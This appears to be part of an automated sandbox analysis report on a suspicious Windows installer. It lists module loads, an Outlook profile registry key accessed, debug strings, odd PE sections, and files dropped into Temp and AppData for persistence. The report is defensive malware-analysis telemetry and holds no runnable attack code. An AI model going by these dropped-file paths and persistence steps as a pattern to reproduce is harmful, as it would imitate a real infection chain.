Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: starburn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: qtcore4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: qtgui4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: qtnetwork4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: qtxml4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F11-9C73-11D3-B32E-00C04F990BB4}\InProcServer32

Jump to behavior

Source: cdglerhptqr.5.dr

LNK file: ..\..\Roaming\TaskManage\RescueCDBurner.exe

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 24EPV9vjc5.exe

Static file information: File size 15692672 > 1048576

Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe

File opened: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\msvcr100.dll

Jump to behavior

Source: 24EPV9vjc5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 24EPV9vjc5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 24EPV9vjc5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 24EPV9vjc5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 24EPV9vjc5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 24EPV9vjc5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 24EPV9vjc5.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 24EPV9vjc5.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: 24EPV9vjc5.exe, 00000001.00000000.1603651664.00000000009DB000.00000002.00000001.01000000.00000003.sdmp, 24EPV9vjc5.exe, 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmp, 24EPV9vjc5.exe, 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmp, 24EPV9vjc5.exe, 00000002.00000000.1610817388.0000000000BBB000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831u& source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2135117627.0000000002E06000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A1 source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2299923554.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325629378.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2249023822.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2184341994.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2137456309.0000000002E05000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb2 #h source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2299923554.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2361165033.0000000002E06000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325629378.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2135117627.0000000002E06000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2249023822.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2184341994.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2137456309.0000000002E05000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: FC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ontainer source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2133774541.0000000002DFF000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2135117627.0000000002E06000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2184341994.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2137456309.0000000002E05000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: tkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2374923256.0000000002DAF000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2133774541.0000000002DFF000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2_& source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2135117627.0000000002E06000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RescueCDBurner.exe, 00000003.00000002.1663466504.000000000A550000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1663285237.000000000A1F3000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1723149297.000000000A479000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1723466728.000000000AB8D000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1723304298.000000000A7D0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1983228135.00000000059A0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982782270.00000000050C7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: LocalCtrl_alpha_v3.exe, 0000000A.00000002.2480291851.0000000002B90000.00000004.00001000.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000002.2493669117.0000000006DC1000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000002.2491783809.00000000067CD000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RescueCDBurner.exe, 00000003.00000002.1663466504.000000000A550000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1663285237.000000000A1F3000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1723149297.000000000A479000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1723466728.000000000AB8D000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1723304298.000000000A7D0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1983228135.00000000059A0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982782270.00000000050C7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2135117627.0000000002E06000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2135117627.0000000002E06000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2299923554.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2361165033.0000000002E06000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325629378.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2135117627.0000000002E06000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2249023822.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2184341994.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2137456309.0000000002E05000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: msvcr100.i386.pdb source: RescueCDBurner.exe, 00000003.00000003.1642320640.00000000010C2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1664139230.000000006C561000.00000020.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1724817625.000000006BE11000.00000020.00000001.01000000.00000016.sdmp
Source:	Binary string: msvcp100.i386.pdb source: RescueCDBurner.exe, 00000003.00000002.1664369552.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, RescueCDBurner.exe, 00000004.00000002.1725610752.000000006D131000.00000020.00000001.01000000.00000015.sdmp
Source:	Binary string: winload_prod.pdb5.1.0 source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2299923554.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2361165033.0000000002E06000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325629378.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2135117627.0000000002E06000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2249023822.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2184341994.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2137456309.0000000002E05000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: LocalCtrl_alpha_v3.exe, 0000000A.00000002.2480291851.0000000002B90000.00000004.00001000.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000002.2493669117.0000000006DC1000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000002.2491783809.00000000067CD000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: re\tkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2374923256.0000000002DAF000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdbna source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2299923554.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2361165033.0000000002E06000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325629378.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2135117627.0000000002E06000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2249023822.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2184341994.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2137456309.0000000002E05000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01ABG& source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2299923554.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325629378.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2249023822.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2184341994.0000000002E05000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2137456309.0000000002E05000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: RescueCDBurner.exe, 00000003.00000002.1665744167.000000006CFE1000.00000020.00000001.01000000.00000008.sdmp, RescueCDBurner.exe, 00000004.00000002.1726167895.000000006E5D1000.00000020.00000001.01000000.00000011.sdmp

Source: 24EPV9vjc5.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 24EPV9vjc5.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 24EPV9vjc5.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 24EPV9vjc5.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 24EPV9vjc5.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB3CB21 _GetDiskFreeSpaceEx_@16,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,

2_2_5BB3CB21

Source: QtCore4.dll.2.dr	Static PE information: real checksum: 0x283beb should be: 0x284aa4
Source: QtCore4.dll.3.dr	Static PE information: real checksum: 0x283beb should be: 0x284aa4
Source: Fondue.dll.2.dr	Static PE information: real checksum: 0x34dc9 should be: 0x3baae
Source: fffwkwbrsb.5.dr	Static PE information: real checksum: 0x2865d3 should be: 0x28b45f
Source: cooisyadg.12.dr	Static PE information: real checksum: 0x2865d3 should be: 0x28b45f
Source: StarBurn.dll.2.dr	Static PE information: real checksum: 0xa4afa should be: 0xab76c
Source: StarBurn.dll.3.dr	Static PE information: real checksum: 0xa4afa should be: 0xab76c

Source: 24EPV9vjc5.exe	Static PE information: section name: .wixburn
Source: 24EPV9vjc5.exe.1.dr	Static PE information: section name: .wixburn
Source: LocalCtrl_alpha_v3.exe.5.dr	Static PE information: section name: Shared
Source: fffwkwbrsb.5.dr	Static PE information: section name: .xdata
Source: fffwkwbrsb.5.dr	Static PE information: section name: gjwrx
Source: cooisyadg.12.dr	Static PE information: section name: .xdata
Source: cooisyadg.12.dr	Static PE information: section name: gjwrx

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009BEAD6 push ecx; ret	1_2_009BEAE9
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00B9EAD6 push ecx; ret	2_2_00B9EAE9
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Code function: 3_2_6C192020 push ecx; mov dword ptr [esp], 00000000h	3_2_6C192021
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Code function: 3_2_6C2A12B5 push ecx; ret	3_2_6C2A12C8
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6BB089C5 push ecx; ret	4_2_6BB089D8

Source: msvcr100.dll.2.dr	Static PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.2.dr	Static PE information: section name: .text entropy: 6.9340411158815725
Source: msvcr100.dll.3.dr	Static PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.3.dr	Static PE information: section name: .text entropy: 6.9340411158815725

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\Fondue.dll	Jump to dropped file
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\QtXml4.dll	Jump to dropped file
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Jump to dropped file
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\QtNetwork4.dll	Jump to dropped file
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	File created: C:\Users\user\AppData\Roaming\TaskManage\msvcr100.dll	Jump to dropped file
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	File created: C:\Users\user\AppData\Roaming\TaskManage\QtGui4.dll	Jump to dropped file
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	File created: C:\Users\user\AppData\Roaming\TaskManage\msvcp100.dll	Jump to dropped file
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	File created: C:\Users\user\AppData\Roaming\TaskManage\QtNetwork4.dll	Jump to dropped file
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\QtGui4.dll	Jump to dropped file
